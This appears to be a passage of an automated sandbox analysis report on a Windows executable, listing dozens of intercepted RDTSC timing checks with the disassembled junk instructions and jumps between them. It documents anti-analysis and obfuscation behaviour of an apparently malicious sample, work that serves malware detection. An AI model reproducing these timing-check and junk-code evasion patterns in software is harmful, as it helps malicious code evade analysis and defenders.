Source: C:\Users\user\Desktop\2fQ8fpTWAP.exe RDTSC instruction interceptor: First address: 822672 second address: 822694 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push edi 0x00000009 pushad 0x0000000a popad 0x0000000b pushad 0x0000000c popad 0x0000000d pop edi 0x0000000e js 00007F7A2CC6ACEAh 0x00000014 push edx 0x00000015 pop edx 0x00000016 pushad 0x00000017 popad 0x00000018 popad 0x00000019 js 00007F7A2CC6AD32h 0x0000001f pushad 0x00000020 push eax 0x00000021 push edx 0x00000022 rdtsc
Source: C:\Users\user\Desktop\2fQ8fpTWAP.exe RDTSC instruction interceptor: First address: 822694 second address: 8226D7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F7A2D39F170h 0x00000009 jmp 00007F7A2D39F177h 0x0000000e popad 0x0000000f push eax 0x00000010 push edx 0x00000011 jmp 00007F7A2D39F16Fh 0x00000016 js 00007F7A2D39F166h 0x0000001c rdtsc
Source: C:\Users\user\Desktop\2fQ8fpTWAP.exe RDTSC instruction interceptor: First address: 822AB6 second address: 822ABA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\2fQ8fpTWAP.exe RDTSC instruction interceptor: First address: 822ABA second address: 822AC0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\2fQ8fpTWAP.exe RDTSC instruction interceptor: First address: 822AC0 second address: 822ACD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push ebx 0x00000008 pop ebx 0x00000009 push ebx 0x0000000a pop ebx 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\2fQ8fpTWAP.exe RDTSC instruction interceptor: First address: 822C4B second address: 822C54 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\2fQ8fpTWAP.exe RDTSC instruction interceptor: First address: 822C54 second address: 822C58 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\2fQ8fpTWAP.exe RDTSC instruction interceptor: First address: 82325A second address: 823277 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7A2D39F174h 0x00000007 pushad 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push esi 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\2fQ8fpTWAP.exe RDTSC instruction interceptor: First address: 8236E4 second address: 823724 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F7A2CC6ACF5h 0x00000009 popad 0x0000000a jmp 00007F7A2CC6ACF9h 0x0000000f popad 0x00000010 pushad 0x00000011 pushad 0x00000012 js 00007F7A2CC6ACE6h 0x00000018 push ecx 0x00000019 pop ecx 0x0000001a push eax 0x0000001b push edx 0x0000001c rdtsc
Source: C:\Users\user\Desktop\2fQ8fpTWAP.exe RDTSC instruction interceptor: First address: 8292C9 second address: 8292D9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F7A2D39F16Ch 0x00000009 rdtsc
Source: C:\Users\user\Desktop\2fQ8fpTWAP.exe RDTSC instruction interceptor: First address: 8292D9 second address: 8292DD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\2fQ8fpTWAP.exe RDTSC instruction interceptor: First address: 8292DD second address: 8292E3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\2fQ8fpTWAP.exe RDTSC instruction interceptor: First address: 8292E3 second address: 829302 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 push eax 0x0000000a push edx 0x0000000b jo 00007F7A2CC6ACE6h 0x00000011 jmp 00007F7A2CC6ACEEh 0x00000016 rdtsc
Source: C:\Users\user\Desktop\2fQ8fpTWAP.exe RDTSC instruction interceptor: First address: 829302 second address: 829325 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a jmp 00007F7A2D39F179h 0x0000000f rdtsc
Source: C:\Users\user\Desktop\2fQ8fpTWAP.exe RDTSC instruction interceptor: First address: 829325 second address: 829363 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7A2CC6ACF9h 0x00000007 ja 00007F7A2CC6ACE6h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f pushad 0x00000010 jmp 00007F7A2CC6ACECh 0x00000015 jg 00007F7A2CC6ACE6h 0x0000001b jnp 00007F7A2CC6ACE6h 0x00000021 push eax 0x00000022 push edx 0x00000023 rdtsc
Source: C:\Users\user\Desktop\2fQ8fpTWAP.exe RDTSC instruction interceptor: First address: 828052 second address: 82805A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 push edi 0x00000007 pop edi 0x00000008 rdtsc
Source: C:\Users\user\Desktop\2fQ8fpTWAP.exe RDTSC instruction interceptor: First address: 82805A second address: 82808A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7A2CC6ACEAh 0x00000007 jmp 00007F7A2CC6ACEDh 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push eax 0x0000000f push edx 0x00000010 jmp 00007F7A2CC6ACF3h 0x00000015 rdtsc
Source: C:\Users\user\Desktop\2fQ8fpTWAP.exe RDTSC instruction interceptor: First address: 827DBF second address: 827DC9 instructions: 0x00000000 rdtsc 0x00000002 jo 00007F7A2D39F166h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\2fQ8fpTWAP.exe RDTSC instruction interceptor: First address: 82B671 second address: 82B68B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jl 00007F7A2CC6ACE6h 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007F7A2CC6ACEDh 0x00000012 rdtsc
Source: C:\Users\user\Desktop\2fQ8fpTWAP.exe RDTSC instruction interceptor: First address: 82E74E second address: 82E776 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jmp 00007F7A2D39F174h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b jnp 00007F7A2D39F16Eh 0x00000011 rdtsc
Source: C:\Users\user\Desktop\2fQ8fpTWAP.exe RDTSC instruction interceptor: First address: 82DF9C second address: 82DFBC instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a jmp 00007F7A2CC6ACF6h 0x0000000f rdtsc
Source: C:\Users\user\Desktop\2fQ8fpTWAP.exe RDTSC instruction interceptor: First address: 82DFBC second address: 82E019 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jnl 00007F7A2D39F166h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pushad 0x0000000d push esi 0x0000000e pop esi 0x0000000f jmp 00007F7A2D39F171h 0x00000014 jmp 00007F7A2D39F178h 0x00000019 popad 0x0000001a jmp 00007F7A2D39F179h 0x0000001f popad 0x00000020 pushad 0x00000021 pushad 0x00000022 jng 00007F7A2D39F166h 0x00000028 push eax 0x00000029 push edx 0x0000002a rdtsc
Source: C:\Users\user\Desktop\2fQ8fpTWAP.exe RDTSC instruction interceptor: First address: 82E019 second address: 82E024 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\2fQ8fpTWAP.exe RDTSC instruction interceptor: First address: 82E024 second address: 82E028 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\2fQ8fpTWAP.exe RDTSC instruction interceptor: First address: 82E1CF second address: 82E1E2 instructions: 0x00000000 rdtsc 0x00000002 jnp 00007F7A2CC6ACE6h 0x00000008 ja 00007F7A2CC6ACE6h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 pushad 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\2fQ8fpTWAP.exe RDTSC instruction interceptor: First address: 82E1E2 second address: 82E1E8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\2fQ8fpTWAP.exe RDTSC instruction interceptor: First address: 82E47B second address: 82E481 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\2fQ8fpTWAP.exe RDTSC instruction interceptor: First address: 79DB9B second address: 79DBBE instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7A2D39F179h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c push esi 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\2fQ8fpTWAP.exe RDTSC instruction interceptor: First address: 79DBBE second address: 79DBC4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\2fQ8fpTWAP.exe RDTSC instruction interceptor: First address: 79DBC4 second address: 79DBCD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\2fQ8fpTWAP.exe RDTSC instruction interceptor: First address: 79DBCD second address: 79DBD1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\2fQ8fpTWAP.exe RDTSC instruction interceptor: First address: 79DBD1 second address: 79DBDB instructions: 0x00000000 rdtsc 0x00000002 jns 00007F7A2D39F166h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\2fQ8fpTWAP.exe RDTSC instruction interceptor: First address: 832835 second address: 832841 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 jbe 00007F7A2CC6ACE6h 0x0000000c rdtsc
Source: C:\Users\user\Desktop\2fQ8fpTWAP.exe RDTSC instruction interceptor: First address: 832841 second address: 83286D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push esi 0x00000007 pushad 0x00000008 popad 0x00000009 jl 00007F7A2D39F166h 0x0000000f pop esi 0x00000010 popad 0x00000011 push eax 0x00000012 push edx 0x00000013 jnp 00007F7A2D39F168h 0x00000019 push ecx 0x0000001a pop ecx 0x0000001b jmp 00007F7A2D39F171h 0x00000020 rdtsc
Source: C:\Users\user\Desktop\2fQ8fpTWAP.exe RDTSC instruction interceptor: First address: 83286D second address: 832872 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\2fQ8fpTWAP.exe RDTSC instruction interceptor: First address: 832872 second address: 832878 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\2fQ8fpTWAP.exe RDTSC instruction interceptor: First address: 8329BE second address: 8329DD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 push ecx 0x00000008 jmp 00007F7A2CC6ACF5h 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\2fQ8fpTWAP.exe RDTSC instruction interceptor: First address: 8329DD second address: 8329F3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 pushad 0x00000006 pushad 0x00000007 popad 0x00000008 js 00007F7A2D39F166h 0x0000000e jno 00007F7A2D39F166h 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
Source: C:\Users\user\Desktop\2fQ8fpTWAP.exe RDTSC instruction interceptor: First address: 8329F3 second address: 832A03 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 jc 00007F7A2CC6ACF8h 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\2fQ8fpTWAP.exe RDTSC instruction interceptor: First address: 832A03 second address: 832A13 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F7A2D39F16Ch 0x00000009 rdtsc
Source: C:\Users\user\Desktop\2fQ8fpTWAP.exe RDTSC instruction interceptor: First address: 832B9C second address: 832BA0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\2fQ8fpTWAP.exe RDTSC instruction interceptor: First address: 832BA0 second address: 832BC2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop ebx 0x00000007 push edx 0x00000008 jmp 00007F7A2D39F16Ch 0x0000000d push edx 0x0000000e jmp 00007F7A2D39F16Bh 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
Source: C:\Users\user\Desktop\2fQ8fpTWAP.exe RDTSC instruction interceptor: First address: 832E99 second address: 832E9F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\2fQ8fpTWAP.exe RDTSC instruction interceptor: First address: 832E9F second address: 832EAD instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7A2D39F16Ah 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\2fQ8fpTWAP.exe RDTSC instruction interceptor: First address: 837671 second address: 83768B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 pushad 0x00000006 push edx 0x00000007 pop edx 0x00000008 pushad 0x00000009 popad 0x0000000a pushad 0x0000000b popad 0x0000000c jnp 00007F7A2CC6ACE6h 0x00000012 popad 0x00000013 pop eax 0x00000014 push eax 0x00000015 push edx 0x00000016 push eax 0x00000017 push edx 0x00000018 push ecx 0x00000019 pop ecx 0x0000001a rdtsc
Source: C:\Users\user\Desktop\2fQ8fpTWAP.exe RDTSC instruction interceptor: First address: 83768B second address: 83768F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\2fQ8fpTWAP.exe RDTSC instruction interceptor: First address: 83768F second address: 8376A6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F7A2CC6ACF1h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
Source: C:\Users\user\Desktop\2fQ8fpTWAP.exe RDTSC instruction interceptor: First address: 8376A6 second address: 8376AD instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\2fQ8fpTWAP.exe RDTSC instruction interceptor: First address: 8377F4 second address: 8377FB instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\2fQ8fpTWAP.exe RDTSC instruction interceptor: First address: 837ABC second address: 837ACB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 jbe 00007F7A2D39F166h 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\2fQ8fpTWAP.exe RDTSC instruction interceptor: First address: 837ACB second address: 837ACF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\2fQ8fpTWAP.exe RDTSC instruction interceptor: First address: 837ACF second address: 837AD3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\2fQ8fpTWAP.exe RDTSC instruction interceptor: First address: 837AD3 second address: 837ADF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jc 00007F7A2CC6ACE6h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
Source: C:\Users\user\Desktop\2fQ8fpTWAP.exe RDTSC instruction interceptor: First address: 837C55 second address: 837C5B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\2fQ8fpTWAP.exe RDTSC instruction interceptor: First address: 837C5B second address: 837C6D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a jns 00007F7A2CC6ACE8h 0x00000010 rdtsc
Source: C:\Users\user\Desktop\2fQ8fpTWAP.exe RDTSC instruction interceptor: First address: 837C6D second address: 837C75 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 pushad 0x00000007 popad 0x00000008 rdtsc
Source: C:\Users\user\Desktop\2fQ8fpTWAP.exe RDTSC instruction interceptor: First address: 837DF5 second address: 837E01 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 jo 00007F7A2CC6ACE6h 0x0000000c rdtsc
Source: C:\Users\user\Desktop\2fQ8fpTWAP.exe RDTSC instruction interceptor: First address: 84413A second address: 84413F instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\2fQ8fpTWAP.exe RDTSC instruction interceptor: First address: 7A9855 second address: 7A9895 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 jnc 00007F7A2CC6ACE8h 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007F7A2CC6ACF6h 0x00000012 pushad 0x00000013 jne 00007F7A2CC6ACE6h 0x00000019 pushad 0x0000001a popad 0x0000001b jmp 00007F7A2CC6ACF1h 0x00000020 popad 0x00000021 rdtsc
Source: C:\Users\user\Desktop\2fQ8fpTWAP.exe RDTSC instruction interceptor: First address: 841FC0 second address: 841FC4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\2fQ8fpTWAP.exe RDTSC instruction interceptor: First address: 84281E second address: 842843 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jo 00007F7A2CC6ACE6h 0x0000000a popad 0x0000000b popad 0x0000000c pushad 0x0000000d jng 00007F7A2CC6ACEEh 0x00000013 push eax 0x00000014 push edx 0x00000015 push ecx 0x00000016 pop ecx 0x00000017 jg 00007F7A2CC6ACE6h 0x0000001d rdtsc
Source: C:\Users\user\Desktop\2fQ8fpTWAP.exe RDTSC instruction interceptor: First address: 842843 second address: 842847 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\2fQ8fpTWAP.exe RDTSC instruction interceptor: First address: 842847 second address: 842858 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push edx 0x00000008 pop edx 0x00000009 js 00007F7A2CC6ACE6h 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\2fQ8fpTWAP.exe RDTSC instruction interceptor: First address: 842B4E second address: 842B54 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 rdtsc
Source: C:\Users\user\Desktop\2fQ8fpTWAP.exe RDTSC instruction interceptor: First address: 842B54 second address: 842B8E instructions: 0x00000000 rdtsc 0x00000002 jnc 00007F7A2CC6ACF4h 0x00000008 jmp 00007F7A2CC6ACF9h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f push esi 0x00000010 jc 00007F7A2CC6ACECh 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
Source: C:\Users\user\Desktop\2fQ8fpTWAP.exe RDTSC instruction interceptor: First address: 842ED1 second address: 842ED7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\2fQ8fpTWAP.exe RDTSC instruction interceptor: First address: 842ED7 second address: 842EDC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\2fQ8fpTWAP.exe RDTSC instruction interceptor: First address: 843199 second address: 84319D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\2fQ8fpTWAP.exe RDTSC instruction interceptor: First address: 84319D second address: 8431AD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push edx 0x00000007 push ebx 0x00000008 pop ebx 0x00000009 jbe 00007F7A2CC6ACE6h 0x0000000f pop edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\2fQ8fpTWAP.exe RDTSC instruction interceptor: First address: 8437B1 second address: 8437BD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jc 00007F7A2D39F166h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\2fQ8fpTWAP.exe RDTSC instruction interceptor: First address: 843A57 second address: 843A90 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push esi 0x00000007 pop esi 0x00000008 jbe 00007F7A2CC6ACE6h 0x0000000e popad 0x0000000f push eax 0x00000010 push edx 0x00000011 jmp 00007F7A2CC6ACF8h 0x00000016 jmp 00007F7A2CC6ACF0h 0x0000001b rdtsc
Source: C:\Users\user\Desktop\2fQ8fpTWAP.exe RDTSC instruction interceptor: First address: 843A90 second address: 843ABA instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7A2D39F16Dh 0x00000007 push esi 0x00000008 pop esi 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007F7A2D39F16Fh 0x00000012 jo 00007F7A2D39F166h 0x00000018 rdtsc
Source: C:\Users\user\Desktop\2fQ8fpTWAP.exe RDTSC instruction interceptor: First address: 843ABA second address: 843ADC instructions: 0x00000000 rdtsc 0x00000002 js 00007F7A2CC6ACE6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a popad 0x0000000b pushad 0x0000000c pushad 0x0000000d jns 00007F7A2CC6ACE6h 0x00000013 push esi 0x00000014 pop esi 0x00000015 pushad 0x00000016 popad 0x00000017 js 00007F7A2CC6ACE6h 0x0000001d popad 0x0000001e push eax 0x0000001f push edx 0x00000020 push eax 0x00000021 push edx 0x00000022 rdtsc
Source: C:\Users\user\Desktop\2fQ8fpTWAP.exe RDTSC instruction interceptor: First address: 843ADC second address: 843AE0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\2fQ8fpTWAP.exe RDTSC instruction interceptor: First address: 843E4B second address: 843E59 instructions: 0x00000000 rdtsc 0x00000002 jns 00007F7A2CC6ACE8h 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\2fQ8fpTWAP.exe RDTSC instruction interceptor: First address: 843E59 second address: 843E5F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\2fQ8fpTWAP.exe RDTSC instruction interceptor: First address: 843E5F second address: 843E63 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\2fQ8fpTWAP.exe RDTSC instruction interceptor: First address: 849957 second address: 849965 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F7A2D39F16Ah 0x00000009 rdtsc
Source: C:\Users\user\Desktop\2fQ8fpTWAP.exe RDTSC instruction interceptor: First address: 849965 second address: 849969 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\2fQ8fpTWAP.exe RDTSC instruction interceptor: First address: 79892D second address: 798934 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 popad 0x00000007 rdtsc
Source: C:\Users\user\Desktop\2fQ8fpTWAP.exe RDTSC instruction interceptor: First address: 84CCAF second address: 84CCB5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\2fQ8fpTWAP.exe RDTSC instruction interceptor: First address: 854409 second address: 854450 instructions: 0x00000000 rdtsc 0x00000002 jno 00007F7A2D39F16Ch 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d pushad 0x0000000e popad 0x0000000f jmp 00007F7A2D39F174h 0x00000014 popad 0x00000015 pushad 0x00000016 jns 00007F7A2D39F166h 0x0000001c jmp 00007F7A2D39F174h 0x00000021 push eax 0x00000022 push edx 0x00000023 rdtsc
Source: C:\Users\user\Desktop\2fQ8fpTWAP.exe RDTSC instruction interceptor: First address: 854450 second address: 854455 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\2fQ8fpTWAP.exe RDTSC instruction interceptor: First address: 854455 second address: 85446B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7A2D39F171h 0x00000007 pushad 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\2fQ8fpTWAP.exe RDTSC instruction interceptor: First address: 85446B second address: 854473 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\2fQ8fpTWAP.exe RDTSC instruction interceptor: First address: 8545CC second address: 8545D5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pushad 0x00000007 popad 0x00000008 popad 0x00000009 rdtsc
Source: C:\Users\user\Desktop\2fQ8fpTWAP.exe RDTSC instruction interceptor: First address: 8545D5 second address: 8545E1 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 push ebx 0x00000004 pop ebx 0x00000005 pop edi 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a pushad 0x0000000b popad 0x0000000c rdtsc
Source: C:\Users\user\Desktop\2fQ8fpTWAP.exe RDTSC instruction interceptor: First address: 8545E1 second address: 8545FA instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b jmp 00007F7A2D39F16Bh 0x00000010 push esi 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\2fQ8fpTWAP.exe RDTSC instruction interceptor: First address: 85490D second address: 854913 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
